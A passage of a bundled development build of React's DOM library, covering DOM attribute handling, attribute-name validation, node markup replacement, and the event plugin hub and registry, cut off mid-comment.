ATTRIBUTE_NAME_START_CHAR = ':A-Z_a-z\\\\u00C0-\\\\u00D6\\\\u00D8-\\\\u00F6\\\\u00F8-\\\\u02FF\\\\u0370-\\\\u037D\\\\u037F-\\\\u1FFF\\\\u200C-\\\\u200D\\\\u2070-\\\\u218F\\\\u2C00-\\\\u2FEF\\\\u3001-\\\\uD7FF\\\\uF900-\\\\uFDCF\\\\uFDF0-\\\\uFFFD';\n/* eslint-enable max-len */\n\n/**\n * DOMProperty exports lookup objects that can be used like functions:\n *\n *   > DOMProperty.isValid['id']\n *   true\n *   > DOMProperty.isValid['foobar']\n *   undefined\n *\n * Although this may be confusing, it performs better in general.\n *\n * @see http://jsperf.com/key-exists\n * @see http://jsperf.com/key-missing\n */\nvar DOMProperty = {\n  ID_ATTRIBUTE_NAME: 'data-reactid',\n  ROOT_ATTRIBUTE_NAME: 'data-reactroot',\n\n  ATTRIBUTE_NAME_START_CHAR: ATTRIBUTE_NAME_START_CHAR,\n  ATTRIBUTE_NAME_CHAR: ATTRIBUTE_NAME_START_CHAR + '\\\\-.0-9\\\\u00B7\\\\u0300-\\\\u036F\\\\u203F-\\\\u2040',\n\n  /**\n   * Map from property \"standard name\" to an object with info about how to set\n   * the property in the DOM. Each object contains:\n   *\n   * attributeName:\n   *   Used when rendering markup or with `*Attribute()`.\n   * attributeNamespace\n   * propertyName:\n   *   Used on DOM node instances. (This includes properties that mutate due to\n   *   external factors.)\n   * mutationMethod:\n   *   If non-null, used instead of the property or `setAttribute()` after\n   *   initial render.\n   * mustUseProperty:\n   *   Whether the property must be accessed and mutated as an object property.\n   * hasBooleanValue:\n   *   Whether the property should be removed when set to a falsey value.\n   * hasNumericValue:\n   *   Whether the property must be numeric or parse as a numeric and should be\n   *   removed when set to a falsey value.\n   * hasPositiveNumericValue:\n   *   Whether the property must be positive numeric or parse as a positive\n   *   numeric and should be removed when set to a falsey value.\n   * hasOverloadedBooleanValue:\n   *   Whether the property can be used as a flag as well as with a value.\n   *   Removed when strictly equal to false; present without a value when\n   *   strictly equal to true; present with a value otherwise.\n   */\n  properties: {},\n\n  /**\n   * Mapping from lowercase property names to the properly cased version, used\n   * to warn in the case of missing properties. Available only in __DEV__.\n   *\n   * autofocus is predefined, because adding it to the property whitelist\n   * causes unintended side effects.\n   *\n   * @type {Object}\n   */\n  getPossibleStandardName: \"development\" !== 'production' ? { autofocus: 'autoFocus' } : null,\n\n  /**\n   * All of the isCustomAttribute() functions that have been injected.\n   */\n  _isCustomAttributeFunctions: [],\n\n  /**\n   * Checks whether a property name is a custom attribute.\n   * @method\n   */\n  isCustomAttribute: function (attributeName) {\n    for (var i = 0; i < DOMProperty._isCustomAttributeFunctions.length; i++) {\n      var isCustomAttributeFn = DOMProperty._isCustomAttributeFunctions[i];\n      if (isCustomAttributeFn(attributeName)) {\n        return true;\n      }\n    }\n    return false;\n  },\n\n  injection: DOMPropertyInjection\n};\n\nmodule.exports = DOMProperty;\n},{\"126\":126,\"152\":152}],12:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMProperty = _dereq_(11);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactInstrumentation = _dereq_(64);\n\nvar quoteAttributeValueForBrowser = _dereq_(125);\nvar warning = _dereq_(159);\n\nvar VALID_ATTRIBUTE_NAME_REGEX = new RegExp('^[' + DOMProperty.ATTRIBUTE_NAME_START_CHAR + '][' + DOMProperty.ATTRIBUTE_NAME_CHAR + ']*$');\nvar illegalAttributeNameCache = {};\nvar validatedAttributeNameCache = {};\n\nfunction isAttributeNameSafe(attributeName) {\n  if (validatedAttributeNameCache.hasOwnProperty(attributeName)) {\n    return true;\n  }\n  if (illegalAttributeNameCache.hasOwnProperty(attributeName)) {\n    return false;\n  }\n  if (VALID_ATTRIBUTE_NAME_REGEX.test(attributeName)) {\n    validatedAttributeNameCache[attributeName] = true;\n    return true;\n  }\n  illegalAttributeNameCache[attributeName] = true;\n  \"development\" !== 'production' ? warning(false, 'Invalid attribute name: `%s`', attributeName) : void 0;\n  return false;\n}\n\nfunction shouldIgnoreValue(propertyInfo, value) {\n  return value == null || propertyInfo.hasBooleanValue && !value || propertyInfo.hasNumericValue && isNaN(value) || propertyInfo.hasPositiveNumericValue && value < 1 || propertyInfo.hasOverloadedBooleanValue && value === false;\n}\n\n/**\n * Operations for dealing with DOM properties.\n */\nvar DOMPropertyOperations = {\n  /**\n   * Creates markup for the ID property.\n   *\n   * @param {string} id Unescaped ID.\n   * @return {string} Markup string.\n   */\n  createMarkupForID: function (id) {\n    return DOMProperty.ID_ATTRIBUTE_NAME + '=' + quoteAttributeValueForBrowser(id);\n  },\n\n  setAttributeForID: function (node, id) {\n    node.setAttribute(DOMProperty.ID_ATTRIBUTE_NAME, id);\n  },\n\n  createMarkupForRoot: function () {\n    return DOMProperty.ROOT_ATTRIBUTE_NAME + '=\"\"';\n  },\n\n  setAttributeForRoot: function (node) {\n    node.setAttribute(DOMProperty.ROOT_ATTRIBUTE_NAME, '');\n  },\n\n  /**\n   * Creates markup for a property.\n   *\n   * @param {string} name\n   * @param {*} value\n   * @return {?string} Markup string, or null if the property was invalid.\n   */\n  createMarkupForProperty: function (name, value) {\n    var propertyInfo = DOMProperty.properties.hasOwnProperty(name) ? DOMProperty.properties[name] : null;\n    if (propertyInfo) {\n      if (shouldIgnoreValue(propertyInfo, value)) {\n        return '';\n      }\n      var attributeName = propertyInfo.attributeName;\n      if (propertyInfo.hasBooleanValue || propertyInfo.hasOverloadedBooleanValue && value === true) {\n        return attributeName + '=\"\"';\n      }\n      return attributeName + '=' + quoteAttributeValueForBrowser(value);\n    } else if (DOMProperty.isCustomAttribute(name)) {\n      if (value == null) {\n        return '';\n      }\n      return name + '=' + quoteAttributeValueForBrowser(value);\n    }\n    return null;\n  },\n\n  /**\n   * Creates markup for a custom property.\n   *\n   * @param {string} name\n   * @param {*} value\n   * @return {string} Markup string, or empty string if the property was invalid.\n   */\n  createMarkupForCustomAttribute: function (name, value) {\n    if (!isAttributeNameSafe(name) || value == null) {\n      return '';\n    }\n    return name + '=' + quoteAttributeValueForBrowser(value);\n  },\n\n  /**\n   * Sets the value for a property on a node.\n   *\n   * @param {DOMElement} node\n   * @param {string} name\n   * @param {*} value\n   */\n  setValueForProperty: function (node, name, value) {\n    var propertyInfo = DOMProperty.properties.hasOwnProperty(name) ? DOMProperty.properties[name] : null;\n    if (propertyInfo) {\n      var mutationMethod = propertyInfo.mutationMethod;\n      if (mutationMethod) {\n        mutationMethod(node, value);\n      } else if (shouldIgnoreValue(propertyInfo, value)) {\n        this.deleteValueForProperty(node, name);\n        return;\n      } else if (propertyInfo.mustUseProperty) {\n        // Contrary to `setAttribute`, object properties are properly\n        // `toString`ed by IE8/9.\n        node[propertyInfo.propertyName] = value;\n      } else {\n        var attributeName = propertyInfo.attributeName;\n        var namespace = propertyInfo.attributeNamespace;\n        // `setAttribute` with objects becomes only `[object]` in IE8/9,\n        // ('' + value) makes it output the correct toString()-value.\n        if (namespace) {\n          node.setAttributeNS(namespace, attributeName, '' + value);\n        } else if (propertyInfo.hasBooleanValue || propertyInfo.hasOverloadedBooleanValue && value === true) {\n          node.setAttribute(attributeName, '');\n        } else {\n          node.setAttribute(attributeName, '' + value);\n        }\n      }\n    } else if (DOMProperty.isCustomAttribute(name)) {\n      DOMPropertyOperations.setValueForAttribute(node, name, value);\n      return;\n    }\n\n    if (\"development\" !== 'production') {\n      var payload = {};\n      payload[name] = value;\n      ReactInstrumentation.debugTool.onHostOperation({\n        instanceID: ReactDOMComponentTree.getInstanceFromNode(node)._debugID,\n        type: 'update attribute',\n        payload: payload\n      });\n    }\n  },\n\n  setValueForAttribute: function (node, name, value) {\n    if (!isAttributeNameSafe(name)) {\n      return;\n    }\n    if (value == null) {\n      node.removeAttribute(name);\n    } else {\n      node.setAttribute(name, '' + value);\n    }\n\n    if (\"development\" !== 'production') {\n      var payload = {};\n      payload[name] = value;\n      ReactInstrumentation.debugTool.onHostOperation({\n        instanceID: ReactDOMComponentTree.getInstanceFromNode(node)._debugID,\n        type: 'update attribute',\n        payload: payload\n      });\n    }\n  },\n\n  /**\n   * Deletes an attributes from a node.\n   *\n   * @param {DOMElement} node\n   * @param {string} name\n   */\n  deleteValueForAttribute: function (node, name) {\n    node.removeAttribute(name);\n    if (\"development\" !== 'production') {\n      ReactInstrumentation.debugTool.onHostOperation({\n        instanceID: ReactDOMComponentTree.getInstanceFromNode(node)._debugID,\n        type: 'remove attribute',\n        payload: name\n      });\n    }\n  },\n\n  /**\n   * Deletes the value for a property on a node.\n   *\n   * @param {DOMElement} node\n   * @param {string} name\n   */\n  deleteValueForProperty: function (node, name) {\n    var propertyInfo = DOMProperty.properties.hasOwnProperty(name) ? DOMProperty.properties[name] : null;\n    if (propertyInfo) {\n      var mutationMethod = propertyInfo.mutationMethod;\n      if (mutationMethod) {\n        mutationMethod(node, undefined);\n      } else if (propertyInfo.mustUseProperty) {\n        var propName = propertyInfo.propertyName;\n        if (propertyInfo.hasBooleanValue) {\n          node[propName] = false;\n        } else {\n          node[propName] = '';\n        }\n      } else {\n        node.removeAttribute(propertyInfo.attributeName);\n      }\n    } else if (DOMProperty.isCustomAttribute(name)) {\n      node.removeAttribute(name);\n    }\n\n    if (\"development\" !== 'production') {\n      ReactInstrumentation.debugTool.onHostOperation({\n        instanceID: ReactDOMComponentTree.getInstanceFromNode(node)._debugID,\n        type: 'remove attribute',\n        payload: name\n      });\n    }\n  }\n};\n\nmodule.exports = DOMPropertyOperations;\n},{\"11\":11,\"125\":125,\"159\":159,\"34\":34,\"64\":64}],13:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar DOMLazyTree = _dereq_(9);\nvar ExecutionEnvironment = _dereq_(138);\n\nvar createNodesFromMarkup = _dereq_(143);\nvar emptyFunction = _dereq_(144);\nvar invariant = _dereq_(152);\n\nvar Danger = {\n  /**\n   * Replaces a node with a string of markup at its current position within its\n   * parent. The markup must render into a single root node.\n   *\n   * @param {DOMElement} oldChild Child node to replace.\n   * @param {string} markup Markup to render in place of the child node.\n   * @internal\n   */\n  dangerouslyReplaceNodeWithMarkup: function (oldChild, markup) {\n    !ExecutionEnvironment.canUseDOM ? \"development\" !== 'production' ? invariant(false, 'dangerouslyReplaceNodeWithMarkup(...): Cannot render markup in a worker thread. Make sure `window` and `document` are available globally before requiring React when unit testing or use ReactDOMServer.renderToString() for server rendering.') : _prodInvariant('56') : void 0;\n    !markup ? \"development\" !== 'production' ? invariant(false, 'dangerouslyReplaceNodeWithMarkup(...): Missing markup.') : _prodInvariant('57') : void 0;\n    !(oldChild.nodeName !== 'HTML') ? \"development\" !== 'production' ? invariant(false, 'dangerouslyReplaceNodeWithMarkup(...): Cannot replace markup of the <html> node. This is because browser quirks make this unreliable and/or slow. If you want to render to the root you must use server rendering. See ReactDOMServer.renderToString().') : _prodInvariant('58') : void 0;\n\n    if (typeof markup === 'string') {\n      var newChild = createNodesFromMarkup(markup, emptyFunction)[0];\n      oldChild.parentNode.replaceChild(newChild, oldChild);\n    } else {\n      DOMLazyTree.replaceChildWithTree(oldChild, markup);\n    }\n  }\n};\n\nmodule.exports = Danger;\n},{\"126\":126,\"138\":138,\"143\":143,\"144\":144,\"152\":152,\"9\":9}],14:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Module that is injectable into `EventPluginHub`, that specifies a\n * deterministic ordering of `EventPlugin`s. A convenient way to reason about\n * plugins, without having to package every one of them. This is better than\n * having plugins be ordered in the same order that they are injected because\n * that ordering would be influenced by the packaging order.\n * `ResponderEventPlugin` must occur before `SimpleEventPlugin` so that\n * preventing default on events is convenient in `SimpleEventPlugin` handlers.\n */\n\nvar DefaultEventPluginOrder = ['ResponderEventPlugin', 'SimpleEventPlugin', 'TapEventPlugin', 'EnterLeaveEventPlugin', 'ChangeEventPlugin', 'SelectEventPlugin', 'BeforeInputEventPlugin'];\n\nmodule.exports = DefaultEventPluginOrder;\n},{}],15:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar EventPropagators = _dereq_(20);\nvar ReactDOMComponentTree = _dereq_(34);\nvar SyntheticMouseEvent = _dereq_(95);\n\nvar eventTypes = {\n  mouseEnter: {\n    registrationName: 'onMouseEnter',\n    dependencies: ['topMouseOut', 'topMouseOver']\n  },\n  mouseLeave: {\n    registrationName: 'onMouseLeave',\n    dependencies: ['topMouseOut', 'topMouseOver']\n  }\n};\n\nvar EnterLeaveEventPlugin = {\n  eventTypes: eventTypes,\n\n  /**\n   * For almost every interaction we care about, there will be both a top-level\n   * `mouseover` and `mouseout` event that occurs. Only use `mouseout` so that\n   * we do not extract duplicate events. However, moving the mouse into the\n   * browser from outside will not fire a `mouseout` event. In this case, we use\n   * the `mouseover` top-level event.\n   */\n  extractEvents: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    if (topLevelType === 'topMouseOver' && (nativeEvent.relatedTarget || nativeEvent.fromElement)) {\n      return null;\n    }\n    if (topLevelType !== 'topMouseOut' && topLevelType !== 'topMouseOver') {\n      // Must not be a mouse in or mouse out - ignoring.\n      return null;\n    }\n\n    var win;\n    if (nativeEventTarget.window === nativeEventTarget) {\n      // `nativeEventTarget` is probably a window object.\n      win = nativeEventTarget;\n    } else {\n      // TODO: Figure out why `ownerDocument` is sometimes undefined in IE8.\n      var doc = nativeEventTarget.ownerDocument;\n      if (doc) {\n        win = doc.defaultView || doc.parentWindow;\n      } else {\n        win = window;\n      }\n    }\n\n    var from;\n    var to;\n    if (topLevelType === 'topMouseOut') {\n      from = targetInst;\n      var related = nativeEvent.relatedTarget || nativeEvent.toElement;\n      to = related ? ReactDOMComponentTree.getClosestInstanceFromNode(related) : null;\n    } else {\n      // Moving to a node from outside the window.\n      from = null;\n      to = targetInst;\n    }\n\n    if (from === to) {\n      // Nothing pertains to our managed components.\n      return null;\n    }\n\n    var fromNode = from == null ? win : ReactDOMComponentTree.getNodeFromInstance(from);\n    var toNode = to == null ? win : ReactDOMComponentTree.getNodeFromInstance(to);\n\n    var leave = SyntheticMouseEvent.getPooled(eventTypes.mouseLeave, from, nativeEvent, nativeEventTarget);\n    leave.type = 'mouseleave';\n    leave.target = fromNode;\n    leave.relatedTarget = toNode;\n\n    var enter = SyntheticMouseEvent.getPooled(eventTypes.mouseEnter, to, nativeEvent, nativeEventTarget);\n    enter.type = 'mouseenter';\n    enter.target = toNode;\n    enter.relatedTarget = fromNode;\n\n    EventPropagators.accumulateEnterLeaveDispatches(leave, enter, from, to);\n\n    return [leave, enter];\n  }\n};\n\nmodule.exports = EnterLeaveEventPlugin;\n},{\"20\":20,\"34\":34,\"95\":95}],16:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Types of raw signals from the browser caught at the top level.\n */\nvar topLevelTypes = {\n  topAbort: null,\n  topAnimationEnd: null,\n  topAnimationIteration: null,\n  topAnimationStart: null,\n  topBlur: null,\n  topCanPlay: null,\n  topCanPlayThrough: null,\n  topChange: null,\n  topClick: null,\n  topCompositionEnd: null,\n  topCompositionStart: null,\n  topCompositionUpdate: null,\n  topContextMenu: null,\n  topCopy: null,\n  topCut: null,\n  topDoubleClick: null,\n  topDrag: null,\n  topDragEnd: null,\n  topDragEnter: null,\n  topDragExit: null,\n  topDragLeave: null,\n  topDragOver: null,\n  topDragStart: null,\n  topDrop: null,\n  topDurationChange: null,\n  topEmptied: null,\n  topEncrypted: null,\n  topEnded: null,\n  topError: null,\n  topFocus: null,\n  topInput: null,\n  topInvalid: null,\n  topKeyDown: null,\n  topKeyPress: null,\n  topKeyUp: null,\n  topLoad: null,\n  topLoadedData: null,\n  topLoadedMetadata: null,\n  topLoadStart: null,\n  topMouseDown: null,\n  topMouseMove: null,\n  topMouseOut: null,\n  topMouseOver: null,\n  topMouseUp: null,\n  topPaste: null,\n  topPause: null,\n  topPlay: null,\n  topPlaying: null,\n  topProgress: null,\n  topRateChange: null,\n  topReset: null,\n  topScroll: null,\n  topSeeked: null,\n  topSeeking: null,\n  topSelectionChange: null,\n  topStalled: null,\n  topSubmit: null,\n  topSuspend: null,\n  topTextInput: null,\n  topTimeUpdate: null,\n  topTouchCancel: null,\n  topTouchEnd: null,\n  topTouchMove: null,\n  topTouchStart: null,\n  topTransitionEnd: null,\n  topVolumeChange: null,\n  topWaiting: null,\n  topWheel: null\n};\n\nvar EventConstants = {\n  topLevelTypes: topLevelTypes\n};\n\nmodule.exports = EventConstants;\n},{}],17:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar EventPluginRegistry = _dereq_(18);\nvar EventPluginUtils = _dereq_(19);\nvar ReactErrorUtils = _dereq_(55);\n\nvar accumulateInto = _dereq_(102);\nvar forEachAccumulated = _dereq_(110);\nvar invariant = _dereq_(152);\n\n/**\n * Internal store for event listeners\n */\nvar listenerBank = {};\n\n/**\n * Internal queue of events that have accumulated their dispatches and are\n * waiting to have their dispatches executed.\n */\nvar eventQueue = null;\n\n/**\n * Dispatches an event and releases it back into the pool, unless persistent.\n *\n * @param {?object} event Synthetic event to be dispatched.\n * @param {boolean} simulated If the event is simulated (changes exn behavior)\n * @private\n */\nvar executeDispatchesAndRelease = function (event, simulated) {\n  if (event) {\n    EventPluginUtils.executeDispatchesInOrder(event, simulated);\n\n    if (!event.isPersistent()) {\n      event.constructor.release(event);\n    }\n  }\n};\nvar executeDispatchesAndReleaseSimulated = function (e) {\n  return executeDispatchesAndRelease(e, true);\n};\nvar executeDispatchesAndReleaseTopLevel = function (e) {\n  return executeDispatchesAndRelease(e, false);\n};\n\nvar getDictionaryKey = function (inst) {\n  // Prevents V8 performance issue:\n  // https://github.com/facebook/react/pull/7232\n  return '.' + inst._rootNodeID;\n};\n\nfunction isInteractive(tag) {\n  return tag === 'button' || tag === 'input' || tag === 'select' || tag === 'textarea';\n}\n\nfunction shouldPreventMouseEvent(name, type, props) {\n  switch (name) {\n    case 'onClick':\n    case 'onClickCapture':\n    case 'onDoubleClick':\n    case 'onDoubleClickCapture':\n    case 'onMouseDown':\n    case 'onMouseDownCapture':\n    case 'onMouseMove':\n    case 'onMouseMoveCapture':\n    case 'onMouseUp':\n    case 'onMouseUpCapture':\n      return !!(props.disabled && isInteractive(type));\n    default:\n      return false;\n  }\n}\n\n/**\n * This is a unified interface for event plugins to be installed and configured.\n *\n * Event plugins can implement the following properties:\n *\n *   `extractEvents` {function(string, DOMEventTarget, string, object): *}\n *     Required. When a top-level event is fired, this method is expected to\n *     extract synthetic events that will in turn be queued and dispatched.\n *\n *   `eventTypes` {object}\n *     Optional, plugins that fire events must publish a mapping of registration\n *     names that are used to register listeners. Values of this mapping must\n *     be objects that contain `registrationName` or `phasedRegistrationNames`.\n *\n *   `executeDispatch` {function(object, function, string)}\n *     Optional, allows plugins to override how an event gets dispatched. By\n *     default, the listener is simply invoked.\n *\n * Each plugin that is injected into `EventsPluginHub` is immediately operable.\n *\n * @public\n */\nvar EventPluginHub = {\n  /**\n   * Methods for injecting dependencies.\n   */\n  injection: {\n    /**\n     * @param {array} InjectedEventPluginOrder\n     * @public\n     */\n    injectEventPluginOrder: EventPluginRegistry.injectEventPluginOrder,\n\n    /**\n     * @param {object} injectedNamesToPlugins Map from names to plugin modules.\n     */\n    injectEventPluginsByName: EventPluginRegistry.injectEventPluginsByName\n  },\n\n  /**\n   * Stores `listener` at `listenerBank[registrationName][key]`. Is idempotent.\n   *\n   * @param {object} inst The instance, which is the source of events.\n   * @param {string} registrationName Name of listener (e.g. `onClick`).\n   * @param {function} listener The callback to store.\n   */\n  putListener: function (inst, registrationName, listener) {\n    !(typeof listener === 'function') ? \"development\" !== 'production' ? invariant(false, 'Expected %s listener to be a function, instead got type %s', registrationName, typeof listener) : _prodInvariant('94', registrationName, typeof listener) : void 0;\n\n    var key = getDictionaryKey(inst);\n    var bankForRegistrationName = listenerBank[registrationName] || (listenerBank[registrationName] = {});\n    bankForRegistrationName[key] = listener;\n\n    var PluginModule = EventPluginRegistry.registrationNameModules[registrationName];\n    if (PluginModule && PluginModule.didPutListener) {\n      PluginModule.didPutListener(inst, registrationName, listener);\n    }\n  },\n\n  /**\n   * @param {object} inst The instance, which is the source of events.\n   * @param {string} registrationName Name of listener (e.g. `onClick`).\n   * @return {?function} The stored callback.\n   */\n  getListener: function (inst, registrationName) {\n    // TODO: shouldPreventMouseEvent is DOM-specific and definitely should not\n    // live here; needs to be moved to a better place soon\n    var bankForRegistrationName = listenerBank[registrationName];\n    if (shouldPreventMouseEvent(registrationName, inst._currentElement.type, inst._currentElement.props)) {\n      return null;\n    }\n    var key = getDictionaryKey(inst);\n    return bankForRegistrationName && bankForRegistrationName[key];\n  },\n\n  /**\n   * Deletes a listener from the registration bank.\n   *\n   * @param {object} inst The instance, which is the source of events.\n   * @param {string} registrationName Name of listener (e.g. `onClick`).\n   */\n  deleteListener: function (inst, registrationName) {\n    var PluginModule = EventPluginRegistry.registrationNameModules[registrationName];\n    if (PluginModule && PluginModule.willDeleteListener) {\n      PluginModule.willDeleteListener(inst, registrationName);\n    }\n\n    var bankForRegistrationName = listenerBank[registrationName];\n    // TODO: This should never be null -- when is it?\n    if (bankForRegistrationName) {\n      var key = getDictionaryKey(inst);\n      delete bankForRegistrationName[key];\n    }\n  },\n\n  /**\n   * Deletes all listeners for the DOM element with the supplied ID.\n   *\n   * @param {object} inst The instance, which is the source of events.\n   */\n  deleteAllListeners: function (inst) {\n    var key = getDictionaryKey(inst);\n    for (var registrationName in listenerBank) {\n      if (!listenerBank.hasOwnProperty(registrationName)) {\n        continue;\n      }\n\n      if (!listenerBank[registrationName][key]) {\n        continue;\n      }\n\n      var PluginModule = EventPluginRegistry.registrationNameModules[registrationName];\n      if (PluginModule && PluginModule.willDeleteListener) {\n        PluginModule.willDeleteListener(inst, registrationName);\n      }\n\n      delete listenerBank[registrationName][key];\n    }\n  },\n\n  /**\n   * Allows registered plugins an opportunity to extract events from top-level\n   * native browser events.\n   *\n   * @return {*} An accumulation of synthetic events.\n   * @internal\n   */\n  extractEvents: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    var events;\n    var plugins = EventPluginRegistry.plugins;\n    for (var i = 0; i < plugins.length; i++) {\n      // Not every plugin in the ordering may be loaded at runtime.\n      var possiblePlugin = plugins[i];\n      if (possiblePlugin) {\n        var extractedEvents = possiblePlugin.extractEvents(topLevelType, targetInst, nativeEvent, nativeEventTarget);\n        if (extractedEvents) {\n          events = accumulateInto(events, extractedEvents);\n        }\n      }\n    }\n    return events;\n  },\n\n  /**\n   * Enqueues a synthetic event that should be dispatched when\n   * `processEventQueue` is invoked.\n   *\n   * @param {*} events An accumulation of synthetic events.\n   * @internal\n   */\n  enqueueEvents: function (events) {\n    if (events) {\n      eventQueue = accumulateInto(eventQueue, events);\n    }\n  },\n\n  /**\n   * Dispatches all synthetic events on the event queue.\n   *\n   * @internal\n   */\n  processEventQueue: function (simulated) {\n    // Set `eventQueue` to null before processing it so that we can tell if more\n    // events get enqueued while processing.\n    var processingEventQueue = eventQueue;\n    eventQueue = null;\n    if (simulated) {\n      forEachAccumulated(processingEventQueue, executeDispatchesAndReleaseSimulated);\n    } else {\n      forEachAccumulated(processingEventQueue, executeDispatchesAndReleaseTopLevel);\n    }\n    !!eventQueue ? \"development\" !== 'production' ? invariant(false, 'processEventQueue(): Additional events were enqueued while processing an event queue. Support for this has not yet been implemented.') : _prodInvariant('95') : void 0;\n    // This would be a good time to rethrow if any of the event handlers threw.\n    ReactErrorUtils.rethrowCaughtError();\n  },\n\n  /**\n   * These are needed for tests only. Do not use!\n   */\n  __purge: function () {\n    listenerBank = {};\n  },\n\n  __getListenerBank: function () {\n    return listenerBank;\n  }\n};\n\nmodule.exports = EventPluginHub;\n},{\"102\":102,\"110\":110,\"126\":126,\"152\":152,\"18\":18,\"19\":19,\"55\":55}],18:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\n/**\n * Injectable ordering of event plugins.\n */\nvar eventPluginOrder = null;\n\n/**\n * Injectable mapping from names to event plugin modules.\n */\nvar namesToPlugins = {};\n\n/**\n * Recomputes the plugin list using the injected plugins and plugin ordering.\n *\n * @private\n */\nfunction recomputePluginOrdering() {\n  if (!eventPluginOrder) {\n    // Wait until an `eventPluginOrder` is injected.\n    return;\n  }\n  for (var pluginName in namesToPlugins) {\n    var pluginModule = namesToPlugins[pluginName];\n    var pluginIndex = eventPluginOrder.indexOf(pluginName);\n    !(pluginIndex > -1) ? \"development\" !== 'production' ? invariant(false, 'EventPluginRegistry: Cannot inject event plugins that do not exist in the plugin ordering, `%s`.', pluginName) : _prodInvariant('96', pluginName) : void 0;\n    if (EventPluginRegistry.plugins[pluginIndex]) {\n      continue;\n    }\n    !pluginModule.extractEvents ? \"development\" !== 'production' ? invariant(false, 'EventPluginRegistry: Event plugins must implement an `extractEvents` method, but `%s` does not.', pluginName) : _prodInvariant('97', pluginName) : void 0;\n    EventPluginRegistry.plugins[pluginIndex] = pluginModule;\n    var publishedEvents = pluginModule.eventTypes;\n    for (var eventName in publishedEvents) {\n      !publishEventForPlugin(publishedEvents[eventName], pluginModule, eventName) ? \"development\" !== 'production' ? invariant(false, 'EventPluginRegistry: Failed to publish event `%s` for plugin `%s`.', eventName, pluginName) : _prodInvariant('98', eventName, pluginName) : void 0;\n    }\n  }\n}\n\n/**\n * Publishes an event so that it can be dispatched by the supplied plugin.\n *\n * @param {object} dispatchConfig Dispatch configuration for the event.\n * @param {object} PluginModule Plugin publishing the event.\n * @return {boolean} True if the event was successfully published.\n * @private\n */\nfunction publishEventForPlugin(dispatchConfig, pluginModule, eventName) {\n  !!EventPluginRegistry.eventNameDispatchConfigs.hasOwnProperty(eventName) ? \"development\" !== 'production' ? invariant(false, 'EventPluginHub: More than one plugin attempted to publish the same event name, `%s`.', eventName) : _prodInvariant('99', eventName) : void 0;\n  EventPluginRegistry.eventNameDispatchConfigs[eventName] = dispatchConfig;\n\n  var phasedRegistrationNames = dispatchConfig.phasedRegistrationNames;\n  if (phasedRegistrationNames) {\n    for (var phaseName in phasedRegistrationNames) {\n      if (phasedRegistrationNames.hasOwnProperty(phaseName)) {\n        var phasedRegistrationName = phasedRegistrationNames[phaseName];\n        publishRegistrationName(phasedRegistrationName, pluginModule, eventName);\n      }\n    }\n    return true;\n  } else if (dispatchConfig.registrationName) {\n    publishRegistrationName(dispatchConfig.registrationName, pluginModule, eventName);\n    return true;\n  }\n  return false;\n}\n\n/**\n * Publishes a registration name that is used to identify dispatched events and\n * can be used with `EventPluginHub.putListener` to register listeners.\n *\n * @param {string} registrationName Registration name to add.\n * @param {object} PluginModule Plugin publishing the event.\n * @private\n */\nfunction publishRegistrationName(registrationName, pluginModule, eventName) {\n  !!EventPluginRegistry.registrationNameModules[registrationName] ? \"development\" !== 'production' ? invariant(false, 'EventPluginHub: More than one plugin attempted to publish the same registration name, `%s`.', registrationName) : _prodInvariant('100', registrationName) : void 0;\n  EventPluginRegistry.registrationNameModules[registrationName] = pluginModule;\n  EventPluginRegistry.registrationNameDependencies[registrationName] = pluginModule.eventTypes[eventName].dependencies;\n\n  if (\"development\" !== 'production') {\n    var lowerCasedName = registrationName.toLowerCase();\n    EventPluginRegistry.possibleRegistrationNames[lowerCasedName] = registrationName;\n\n    if (registrationName === 'onDoubleClick') {\n      EventPluginRegistry.possibleRegistrationNames.ondblclick = registrationName;\n    }\n  }\n}\n\n/**\n * Registers plugins so that they can extract and dispatch events.\n *\n * @see {EventPluginHub}\n */\nvar EventPluginRegistry = {\n  /**\n   * Ordered list of injected plugins.\n   */\n  plugins: [],\n\n  /**\n   * Mapping from event name to dispatch config\n   */\n  eventNameDispatchConfigs: {},\n\n  /**\n   * Mapping from registration name to plugin module\n   */\n  registrationNameModules: {},\n\n  /**\n   * Mapping from registration name to event name\n   */\n  registrationNameDependencies: {},\n\n  /**\n   * Mapping from lowercase registration names to the properly cased version,\n   * used to warn in the case of missing event handlers. Available\n   * only in __DEV__.\n   * 